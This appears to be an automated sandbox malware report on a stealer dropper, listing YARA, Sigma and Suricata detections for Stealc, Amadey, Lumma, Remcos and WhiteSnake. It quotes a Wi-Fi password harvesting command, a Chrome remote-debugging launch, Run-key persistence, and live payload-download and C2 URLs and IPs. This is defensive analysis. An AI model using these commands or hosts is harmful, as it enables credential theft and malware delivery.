decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 83 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.770000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
30.2.ed55d3f620.exe.5ef0000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
32.2.c2a8de8bf3.exe.3f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
26.2.ed55d3f620.exe.5ca0000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
28.2.c2a8de8bf3.exe.3f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
11.2.skotes.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.skotes.exe.b20000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
9.2.DocumentsFHIEBKKFHI.exe.8b0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe, ParentProcessId: 8080, ParentProcessName: buildd.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6616, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed55d3f620.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6816, ParentProcessName: file.exe, ProcessCommandLine: "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 5812, ProcessName: chrome.exe

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 147.124.221.201, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe, Initiated: true, ProcessId: 8080, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49882

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7336, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed55d3f620.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe, ProcessId: 7184, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-A34JIZ

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe, ParentProcessId: 8080, ParentProcessName: buildd.exe, ProcessCommandLine: "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]", ProcessId: 6616, ProcessName: cmd.exe

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\ProgramData\Remcos\remcos.exe, ProcessId: 7280, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:15.939642+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49756	TCP
2024-11-07T04:12:54.499520+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.4	49763	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:23.887462+0100	2028371	3	Unknown Traffic	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:24.877289+0100	2028371	3	Unknown Traffic	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:26.980626+0100	2028371	3	Unknown Traffic	192.168.2.4	49931	104.21.5.155	443	TCP
2024-11-07T04:13:29.832389+0100	2028371	3	Unknown Traffic	192.168.2.4	49944	104.21.5.155	443	TCP
2024-11-07T04:13:32.482276+0100	2028371	3	Unknown Traffic	192.168.2.4	49963	104.21.5.155	443	TCP
2024-11-07T04:13:36.138219+0100	2028371	3	Unknown Traffic	192.168.2.4	49986	104.21.5.155	443	TCP
2024-11-07T04:13:36.845548+0100	2028371	3	Unknown Traffic	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:38.321777+0100	2028371	3	Unknown Traffic	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:38.364296+0100	2028371	3	Unknown Traffic	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:39.816299+0100	2028371	3	Unknown Traffic	192.168.2.4	50009	104.21.5.155	443	TCP
2024-11-07T04:13:41.411703+0100	2028371	3	Unknown Traffic	192.168.2.4	50022	104.21.5.155	443	TCP
2024-11-07T04:13:43.060289+0100	2028371	3	Unknown Traffic	192.168.2.4	50035	104.21.5.155	443	TCP
2024-11-07T04:13:44.000205+0100	2028371	3	Unknown Traffic	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:45.396683+0100	2028371	3	Unknown Traffic	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-07T04:13:47.368869+0100	2028371	3	Unknown Traffic	192.168.2.4	50062	104.21.5.155	443	TCP
2024-11-07T04:13:49.794538+0100	2028371	3	Unknown Traffic	192.168.2.4	50080	104.21.5.155	443	TCP

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:17.103060+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49868	194.59.31.120	8452	TCP
2024-11-07T04:13:18.762640+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49876	194.59.31.120	8452	TCP
2024-11-07T04:13:20.363303+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49887	194.59.31.120	8452	TCP
2024-11-07T04:13:21.983439+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49893	194.59.31.120	8452	TCP
2024-11-07T04:13:23.581125+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49904	194.59.31.120	8452	TCP
2024-11-07T04:13:25.219265+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49919	194.59.31.120	8452	TCP
2024-11-07T04:13:26.813935+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49930	194.59.31.120	8452	TCP
2024-11-07T04:13:28.410089+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49937	194.59.31.120	8452	TCP
2024-11-07T04:13:30.042435+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49950	194.59.31.120	8452	TCP
2024-11-07T04:13:31.643256+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49957	194.59.31.120	8452	TCP
2024-11-07T04:13:33.628032+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49967	194.59.31.120	8452	TCP
2024-11-07T04:13:35.236521+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49983	194.59.31.120	8452	TCP
2024-11-07T04:13:36.845100+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	49993	194.59.31.120	8452	TCP
2024-11-07T04:13:38.454171+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50004	194.59.31.120	8452	TCP
2024-11-07T04:13:40.056843+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50015	194.59.31.120	8452	TCP
2024-11-07T04:13:41.657659+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50023	194.59.31.120	8452	TCP
2024-11-07T04:13:43.254203+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50036	194.59.31.120	8452	TCP
2024-11-07T04:13:44.862688+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50048	194.59.31.120	8452	TCP
2024-11-07T04:13:46.491114+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50056	194.59.31.120	8452	TCP
2024-11-07T04:13:48.232554+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50070	194.59.31.120	8452	TCP
2024-11-07T04:13:49.839720+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50081	194.59.31.120	8452	TCP
2024-11-07T04:13:51.441145+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50090	194.59.31.120	8452	TCP
2024-11-07T04:13:53.043927+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50092	194.59.31.120	8452	TCP
2024-11-07T04:13:54.661248+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50094	194.59.31.120	8452	TCP
2024-11-07T04:13:56.267976+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50096	194.59.31.120	8452	TCP
2024-11-07T04:13:58.281740+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50097	194.59.31.120	8452	TCP
2024-11-07T04:13:59.878082+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50100	194.59.31.120	8452	TCP
2024-11-07T04:14:01.642789+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50102	194.59.31.120	8452	TCP
2024-11-07T04:14:03.253532+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50103	194.59.31.120	8452	TCP
2024-11-07T04:14:05.799092+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.4	50104	194.59.31.120	8452	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:24.105056+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:25.586875+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:37.627046+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:38.867433+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:44.684696+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:50.292249+0100	2054653	1	A Network Trojan was detected	192.168.2.4	50080	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:24.105056+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:37.627046+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49992	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:25.586875+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:38.867433+0100	2049812	1	A Network Trojan was detected	192.168.2.4	50003	104.21.5.155	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:23.887462+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49906	104.21.5.155	443	TCP
2024-11-07T04:13:24.877289+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49916	104.21.5.155	443	TCP
2024-11-07T04:13:26.980626+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49931	104.21.5.155	443	TCP
2024-11-07T04:13:29.832389+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49944	104.21.5.155	443	TCP
2024-11-07T04:13:32.482276+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49963	104.21.5.155	443	TCP
2024-11-07T04:13:36.138219+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49986	104.21.5.155	443	TCP
2024-11-07T04:13:36.845548+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	49992	104.21.5.155	443	TCP
2024-11-07T04:13:38.321777+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:38.364296+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50003	104.21.5.155	443	TCP
2024-11-07T04:13:39.816299+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50009	104.21.5.155	443	TCP
2024-11-07T04:13:41.411703+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50022	104.21.5.155	443	TCP
2024-11-07T04:13:43.060289+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50035	104.21.5.155	443	TCP
2024-11-07T04:13:44.000205+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50042	104.21.5.155	443	TCP
2024-11-07T04:13:45.396683+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50051	104.21.5.155	443	TCP
2024-11-07T04:13:47.368869+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50062	104.21.5.155	443	TCP
2024-11-07T04:13:49.794538+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.4	50080	104.21.5.155	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:12.882789+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49845	185.215.113.43	80	TCP
2024-11-07T04:13:18.478864+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49869	185.215.113.43	80	TCP
2024-11-07T04:13:24.146553+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49905	185.215.113.43	80	TCP
2024-11-07T04:13:29.847687+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49943	185.215.113.43	80	TCP
2024-11-07T04:13:34.269386+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49973	185.215.113.43	80	TCP
2024-11-07T04:13:40.647582+0100	2044696	1	A Network Trojan was detected	192.168.2.4	50016	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:22.484467+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	52995	1.1.1.1	53	UDP
2024-11-07T04:13:36.105644+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.4	59564	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:22.542592+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	51086	1.1.1.1	53	UDP
2024-11-07T04:13:36.131002+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.4	63730	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:23.232287+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.4	59704	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:22.979509+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	53474	1.1.1.1	53	UDP
2024-11-07T04:13:36.163564+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.4	64899	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:22.458173+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	60407	1.1.1.1	53	UDP
2024-11-07T04:13:36.079045+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.4	51687	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:22.590409+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	61705	1.1.1.1	53	UDP
2024-11-07T04:13:36.138916+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.4	55901	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:01.420109+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:01.352927+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:01.693492+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:02.914694+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:01.837421+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.4	49730	TCP

ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP POST Report Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:19.212160+0100	2050602	1	A Network Trojan was detected	192.168.2.4	49882	147.124.221.201	8080	TCP

ET MALWARE [ANY.RUN] WhiteSnake Stealer HTTP Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:19.158856+0100	2050601	1	A Network Trojan was detected	192.168.2.4	49882	147.124.221.201	8080	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:27.896375+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49931	104.21.5.155	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:01.072887+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:13:33.164036+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49964	185.215.113.206	80	TCP
2024-11-07T04:13:48.453361+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50065	185.215.113.206	80	TCP
2024-11-07T04:13:53.974923+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50093	185.215.113.206	80	TCP
2024-11-07T04:13:58.627998+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	50098	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:05.303393+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49799	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:11.961125+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.4	49815	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:08.629711+0100	2803305	3	Unknown Traffic	192.168.2.4	49821	31.41.244.11	80	TCP
2024-11-07T04:13:13.775718+0100	2803305	3	Unknown Traffic	192.168.2.4	49851	31.41.244.11	80	TCP
2024-11-07T04:13:19.391687+0100	2803305	3	Unknown Traffic	192.168.2.4	49880	185.215.113.16	80	TCP
2024-11-07T04:13:25.049524+0100	2803305	3	Unknown Traffic	192.168.2.4	49912	185.215.113.16	80	TCP
2024-11-07T04:13:35.252141+0100	2803305	3	Unknown Traffic	192.168.2.4	49979	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:12:03.463518+0100	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.206	80	TCP
2024-11-07T04:12:18.577586+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:19.872054+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:20.424612+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:20.989904+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:22.076547+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:22.717612+0100	2803304	3	Unknown Traffic	192.168.2.4	49755	185.215.113.206	80	TCP
2024-11-07T04:12:26.835195+0100	2803304	3	Unknown Traffic	192.168.2.4	49762	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-07T04:13:38.325273+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50002	104.21.5.155	443	TCP
2024-11-07T04:13:47.372480+0100	2843864	1	A Network Trojan was detected	192.168.2.4	50062	104.21.5.155	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/746f34465cf17784/freebl3.dllu	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apieed	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.phpThe	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/746f34465cf17784/freebl3.dllo	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apib	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apiF	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.php/m	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.php/n	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/random.exeM	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/luma/random.exe9	Avira URL Cloud: Label: phishing
Source: https://founpiuer.store:443/api4	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.phpa-7368302a1ad4	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php/h	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/6c4adf523b719729.phpty	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/apider	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exeb	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/mine/random.exei	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/6c4adf523b719729.phptf	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/steam/random.exes	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/746f34465cf17784/msvcp140.dll9	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/RRC:	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedP	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedz	Avira URL Cloud: Label: malware
Source: https://founpiuer.store/vo	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpesf	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/remcos_a.exe	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\buildd[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\ProgramData\Remcos\remcos.exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\remcos_a[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1314794
Source: C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\DocumentsFHIEBKKFHI.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

